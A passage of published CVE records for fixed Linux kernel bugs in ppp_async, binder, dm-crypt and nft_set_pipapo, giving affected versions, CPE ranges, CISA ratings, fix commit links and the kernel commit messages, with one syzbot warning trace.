"lessThan": "7e5ef49670766c9742ffcd9cead7cdb018268719",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "210d938f963dddc543b07e66a79b7d8d4bd00bd8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cb88cb53badb8aeb3955ad6ce80b07b598e310b8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ppp/ppp_async.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nppp_async: limit MRU to 64K\n\nsyzbot triggered a warning [1] in __alloc_pages():\n\nWARN_ON_ONCE_GFP(order \u003e MAX_PAGE_ORDER, gfp)\n\nWillem fixed a similar issue in commit c0a2a1b0d631 (\"ppp: limit MRU to 64K\")\n\nAdopt the same sanity check for ppp_async_ioctl(PPPIOCSMRU)\n\n[1]:\n\n WARNING: CPU: 1 PID: 11 at mm/page_alloc.c:4543 __alloc_pages+0x308/0x698 mm/page_alloc.c:4543\nModules linked in:\nCPU: 1 PID: 11 Comm: kworker/u4:0 Not tainted 6.8.0-rc2-syzkaller-g41bccc98fb79 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023\nWorkqueue: events_unbound flush_to_ldisc\npstate: 204000c5 (nzCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : __alloc_pages+0x308/0x698 mm/page_alloc.c:4543\n lr : __alloc_pages+0xc8/0x698 mm/page_alloc.c:4537\nsp : ffff800093967580\nx29: ffff800093967660 x28: ffff8000939675a0 x27: dfff800000000000\nx26: ffff70001272ceb4 x25: 0000000000000000 x24: ffff8000939675c0\nx23: 0000000000000000 x22: 0000000000060820 x21: 1ffff0001272ceb8\nx20: ffff8000939675e0 x19: 0000000000000010 x18: ffff800093967120\nx17: ffff800083bded5c x16: ffff80008ac97500 x15: 0000000000000005\nx14: 1ffff0001272cebc x13: 0000000000000000 x12: 0000000000000000\nx11: ffff70001272cec1 x10: 1ffff0001272cec0 x9 : 0000000000000001\nx8 : ffff800091c91000 x7 : 0000000000000000 x6 : 000000000000003f\nx5 : 00000000ffffffff x4 : 0000000000000000 x3 : 0000000000000020\nx2 : 0000000000000008 x1 : 0000000000000000 x0 : ffff8000939675e0\nCall trace:\n __alloc_pages+0x308/0x698 mm/page_alloc.c:4543\n __alloc_pages_node include/linux/gfp.h:238 [inline]\n alloc_pages_node include/linux/gfp.h:261 [inline]\n __kmalloc_large_node+0xbc/0x1fc mm/slub.c:3926\n __do_kmalloc_node mm/slub.c:3969 [inline]\n __kmalloc_node_track_caller+0x418/0x620 mm/slub.c:4001\n kmalloc_reserve+0x17c/0x23c net/core/skbuff.c:590\n __alloc_skb+0x1c8/0x3d8 net/core/skbuff.c:651\n __netdev_alloc_skb+0xb8/0x3e8 net/core/skbuff.c:715\n netdev_alloc_skb include/linux/skbuff.h:3235 [inline]\n dev_alloc_skb include/linux/skbuff.h:3248 [inline]\n ppp_async_input drivers/net/ppp/ppp_async.c:863 [inline]\n ppp_asynctty_receive+0x588/0x186c drivers/net/ppp/ppp_async.c:341\n tty_ldisc_receive_buf+0x12c/0x15c drivers/tty/tty_buffer.c:390\n tty_port_default_receive_buf+0x74/0xac drivers/tty/tty_port.c:37\n receive_buf drivers/tty/tty_buffer.c:444 [inline]\n flush_to_ldisc+0x284/0x6e4 drivers/tty/tty_buffer.c:494\n process_one_work+0x694/0x1204 kernel/workqueue.c:2633\n process_scheduled_works kernel/workqueue.c:2706 [inline]\n worker_thread+0x938/0xef4 kernel/workqueue.c:2787\n kthread+0x288/0x310 kernel/kthread.c:388\n ret_from_fork+0x10/0x20 arch/arm64/kernel/entry.S:860"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:42.211Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4fdb14ba89faff6e6969a4dffdc8e54235d6e5ed"
},
{
"url": "https://git.kernel.org/stable/c/56fae81633ccee307cfcb032f706bf1863a56982"
},
{
"url": "https://git.kernel.org/stable/c/b06e067e93fa4b98acfd3a9f38a398ab91bbc58b"
},
{
"url": "https://git.kernel.org/stable/c/58fbe665b097bf7b3144da7e7b91fb27aa8d0ae3"
},
{
"url": "https://git.kernel.org/stable/c/4e2c4846b2507f6dfc9bea72b7567c2693a82a16"
},
{
"url": "https://git.kernel.org/stable/c/7e5ef49670766c9742ffcd9cead7cdb018268719"
},
{
"url": "https://git.kernel.org/stable/c/210d938f963dddc543b07e66a79b7d8d4bd00bd8"
},
{
"url": "https://git.kernel.org/stable/c/cb88cb53badb8aeb3955ad6ce80b07b598e310b8"
}
],
"title": "ppp_async: limit MRU to 64K",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26675",
"datePublished": "2024-04-02T07:01:40.054Z",
"dateReserved": "2024-02-19T14:20:24.151Z",
"dateUpdated": "2025-05-04T08:53:42.211Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26926 (GCVE-0-2024-26926)
Vulnerability from cvelistv5
Published
2024-04-24 23:23
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
binder: check offset alignment in binder_get_object()
Commit 6d98eb95b450 ("binder: avoid potential data leakage when copying
txn") introduced changes to how binder objects are copied. In doing so,
it unintentionally removed an offset alignment check done through calls
to binder_alloc_copy_from_buffer() -> check_buffer().
These calls were replaced in binder_get_object() with copy_from_user(),
so now an explicit offset alignment check is needed here. This avoids
later complications when unwinding the objects gets harder.
It is worth noting this check existed prior to commit 7a67a39320df
("binder: add function to copy binder object from buffer"), likely
removed due to redundancy at the time.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c056a6ba35e00ae943e377eb09abd77a6915b31a Version: 23e9d815fad84c1bee3742a8de4bd39510435362 Version: 7a9ad4aceb0226b391c9d3b8e4ac2e7d438b6bde Version: 6d98eb95b450a75adb4516a1d33652dc78d2b20c Version: 6d98eb95b450a75adb4516a1d33652dc78d2b20c Version: 6d98eb95b450a75adb4516a1d33652dc78d2b20c Version: 6d98eb95b450a75adb4516a1d33652dc78d2b20c Version: 66e12f5b3a9733f941893a00753b10498724607d |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "68a28f551e46",
"status": "affected",
"version": "c056a6ba35e0",
"versionType": "custom"
},
{
"lessThan": "48a1f83ca9c6",
"status": "affected",
"version": "23e9d815fad8",
"versionType": "custom"
},
{
"lessThan": "a2fd6dbc98be",
"status": "affected",
"version": "7a9ad4aceb02",
"versionType": "custom"
},
{
"lessThan": "a6d2a8b211c8",
"status": "affected",
"version": "6d98eb95b450",
"versionType": "custom"
},
{
"lessThan": "1d7f1049035b",
"status": "affected",
"version": "6d98eb95b450",
"versionType": "custom"
},
{
"lessThan": "f01d66190457",
"status": "affected",
"version": "6d98eb95b450",
"versionType": "custom"
},
{
"lessThan": "aaef73821a3b",
"status": "affected",
"version": "6d98eb95b450",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.17:-:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.17"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26926",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-13T03:55:21.790532Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-13T14:39:55.884Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.552Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68a28f551e4690db2b27b3db716c7395f6fada12"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/48a1f83ca9c68518b1a783c62e6a8223144fa9fc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2fd6dbc98be1105a1d8e9e31575da8873ef115c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6d2a8b211c874971ee4cf3ddd167408177f6e76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d7f1049035b2060342f11eff957cf567d810bdc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f01d6619045704d78613b14e2e0420bfdb7f1c15"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aaef73821a3b0194a01bd23ca77774f704a04d40"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/android/binder.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "68a28f551e4690db2b27b3db716c7395f6fada12",
"status": "affected",
"version": "c056a6ba35e00ae943e377eb09abd77a6915b31a",
"versionType": "git"
},
{
"lessThan": "48a1f83ca9c68518b1a783c62e6a8223144fa9fc",
"status": "affected",
"version": "23e9d815fad84c1bee3742a8de4bd39510435362",
"versionType": "git"
},
{
"lessThan": "a2fd6dbc98be1105a1d8e9e31575da8873ef115c",
"status": "affected",
"version": "7a9ad4aceb0226b391c9d3b8e4ac2e7d438b6bde",
"versionType": "git"
},
{
"lessThan": "a6d2a8b211c874971ee4cf3ddd167408177f6e76",
"status": "affected",
"version": "6d98eb95b450a75adb4516a1d33652dc78d2b20c",
"versionType": "git"
},
{
"lessThan": "1d7f1049035b2060342f11eff957cf567d810bdc",
"status": "affected",
"version": "6d98eb95b450a75adb4516a1d33652dc78d2b20c",
"versionType": "git"
},
{
"lessThan": "f01d6619045704d78613b14e2e0420bfdb7f1c15",
"status": "affected",
"version": "6d98eb95b450a75adb4516a1d33652dc78d2b20c",
"versionType": "git"
},
{
"lessThan": "aaef73821a3b0194a01bd23ca77774f704a04d40",
"status": "affected",
"version": "6d98eb95b450a75adb4516a1d33652dc78d2b20c",
"versionType": "git"
},
{
"status": "affected",
"version": "66e12f5b3a9733f941893a00753b10498724607d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/android/binder.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.17"
},
{
"lessThan": "5.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.4.226",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.10.157",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "5.15.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.16.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinder: check offset alignment in binder_get_object()\n\nCommit 6d98eb95b450 (\"binder: avoid potential data leakage when copying\ntxn\") introduced changes to how binder objects are copied. In doing so,\nit unintentionally removed an offset alignment check done through calls\nto binder_alloc_copy_from_buffer() -\u003e check_buffer().\n\nThese calls were replaced in binder_get_object() with copy_from_user(),\nso now an explicit offset alignment check is needed here. This avoids\nlater complications when unwinding the objects gets harder.\n\nIt is worth noting this check existed prior to commit 7a67a39320df\n(\"binder: add function to copy binder object from buffer\"), likely\nremoved due to redundancy at the time."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:13.342Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/68a28f551e4690db2b27b3db716c7395f6fada12"
},
{
"url": "https://git.kernel.org/stable/c/48a1f83ca9c68518b1a783c62e6a8223144fa9fc"
},
{
"url": "https://git.kernel.org/stable/c/a2fd6dbc98be1105a1d8e9e31575da8873ef115c"
},
{
"url": "https://git.kernel.org/stable/c/a6d2a8b211c874971ee4cf3ddd167408177f6e76"
},
{
"url": "https://git.kernel.org/stable/c/1d7f1049035b2060342f11eff957cf567d810bdc"
},
{
"url": "https://git.kernel.org/stable/c/f01d6619045704d78613b14e2e0420bfdb7f1c15"
},
{
"url": "https://git.kernel.org/stable/c/aaef73821a3b0194a01bd23ca77774f704a04d40"
}
],
"title": "binder: check offset alignment in binder_get_object()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26926",
"datePublished": "2024-04-24T23:23:40.600Z",
"dateReserved": "2024-02-19T14:20:24.194Z",
"dateUpdated": "2025-05-04T12:55:13.342Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26763 (GCVE-0-2024-26763)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dm-crypt: don't modify the data when using authenticated encryption
It was said that authenticated encryption could produce invalid tag when
the data that is being encrypted is modified [1]. So, fix this problem by
copying the data into the clone bio first and then encrypt them inside the
clone bio.
This may reduce performance, but it is needed to prevent the user from
corrupting the device by writing data with O_DIRECT and modifying them at
the same time.
[1] https://lore.kernel.org/all/20240207004723.GA35324@sol.localdomain/T/
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.305Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/43a202bd552976497474ae144942e32cc5f34d7e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0dccbb93538fe89a86c6de31d4b1c8c560848eaa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c652f6fa1e1f9f02c3fbf359d260ad153ec5f90"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1a4371db68a31076afbe56ecce34fbbe6c80c529"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e08c2a8d27e989f0f5b0888792643027d7e691e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/64ba01a365980755732972523600a961c4266b75"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d9e3763a505e50ba3bd22846f2a8db99429fb857"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/50c70240097ce41fe6bce6478b80478281e4d0f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26763",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:51:31.262032Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:13.692Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/md/dm-crypt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "43a202bd552976497474ae144942e32cc5f34d7e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0dccbb93538fe89a86c6de31d4b1c8c560848eaa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3c652f6fa1e1f9f02c3fbf359d260ad153ec5f90",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1a4371db68a31076afbe56ecce34fbbe6c80c529",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e08c2a8d27e989f0f5b0888792643027d7e691e6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "64ba01a365980755732972523600a961c4266b75",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d9e3763a505e50ba3bd22846f2a8db99429fb857",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "50c70240097ce41fe6bce6478b80478281e4d0f7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/md/dm-crypt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm-crypt: don\u0027t modify the data when using authenticated encryption\n\nIt was said that authenticated encryption could produce invalid tag when\nthe data that is being encrypted is modified [1]. So, fix this problem by\ncopying the data into the clone bio first and then encrypt them inside the\nclone bio.\n\nThis may reduce performance, but it is needed to prevent the user from\ncorrupting the device by writing data with O_DIRECT and modifying them at\nthe same time.\n\n[1] https://lore.kernel.org/all/20240207004723.GA35324@sol.localdomain/T/"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:57.430Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/43a202bd552976497474ae144942e32cc5f34d7e"
},
{
"url": "https://git.kernel.org/stable/c/0dccbb93538fe89a86c6de31d4b1c8c560848eaa"
},
{
"url": "https://git.kernel.org/stable/c/3c652f6fa1e1f9f02c3fbf359d260ad153ec5f90"
},
{
"url": "https://git.kernel.org/stable/c/1a4371db68a31076afbe56ecce34fbbe6c80c529"
},
{
"url": "https://git.kernel.org/stable/c/e08c2a8d27e989f0f5b0888792643027d7e691e6"
},
{
"url": "https://git.kernel.org/stable/c/64ba01a365980755732972523600a961c4266b75"
},
{
"url": "https://git.kernel.org/stable/c/d9e3763a505e50ba3bd22846f2a8db99429fb857"
},
{
"url": "https://git.kernel.org/stable/c/50c70240097ce41fe6bce6478b80478281e4d0f7"
}
],
"title": "dm-crypt: don\u0027t modify the data when using authenticated encryption",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26763",
"datePublished": "2024-04-03T17:00:46.308Z",
"dateReserved": "2024-02-19T14:20:24.172Z",
"dateUpdated": "2025-05-04T08:55:57.430Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26924 (GCVE-0-2024-26924)
Vulnerability from cvelistv5
Published
2024-04-24 21:49
Modified
2025-11-04 17:14
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_set_pipapo: do not free live element
Pablo reports a crash with large batches of elements with a
back-to-back add/remove pattern. Quoting Pablo:
add_elem("00000000") timeout 100 ms
...
add_elem("0000000X") timeout 100 ms
del_elem("0000000X") <---------------- delete one that was just added
...
add_elem("00005000") timeout 100 ms
1) nft_pipapo_remove() removes element 0000000X
Then, KASAN shows a splat.
Looking at the remove function there is a chance that we will drop a
rule that maps to a non-deactivated element.
Removal happens in two steps, first we do a lookup for key k and return the
to-be-removed element and mark it as inactive in the next generation.
Then, in a second step, the element gets removed from the set/map.
The _remove function does not work correctly if we have more than one
element that share the same key.
This can happen if we insert an element into a set when the set already
holds an element with same key, but the element mapping to the existing
key has timed out or is not active in the next generation.
In such case its possible that removal will unmap the wrong element.
If this happens, we will leak the non-deactivated element, it becomes
unreachable.
The element that got deactivated (and will be freed later) will
remain reachable in the set data structure, this can result in
a crash when such an element is retrieved during lookup (stale
pointer).
Add a check that the fully matching key does in fact map to the element
that we have marked as inactive in the deactivation step.
If not, we need to continue searching.
Add a bug/warn trap at the end of the function as well, the remove
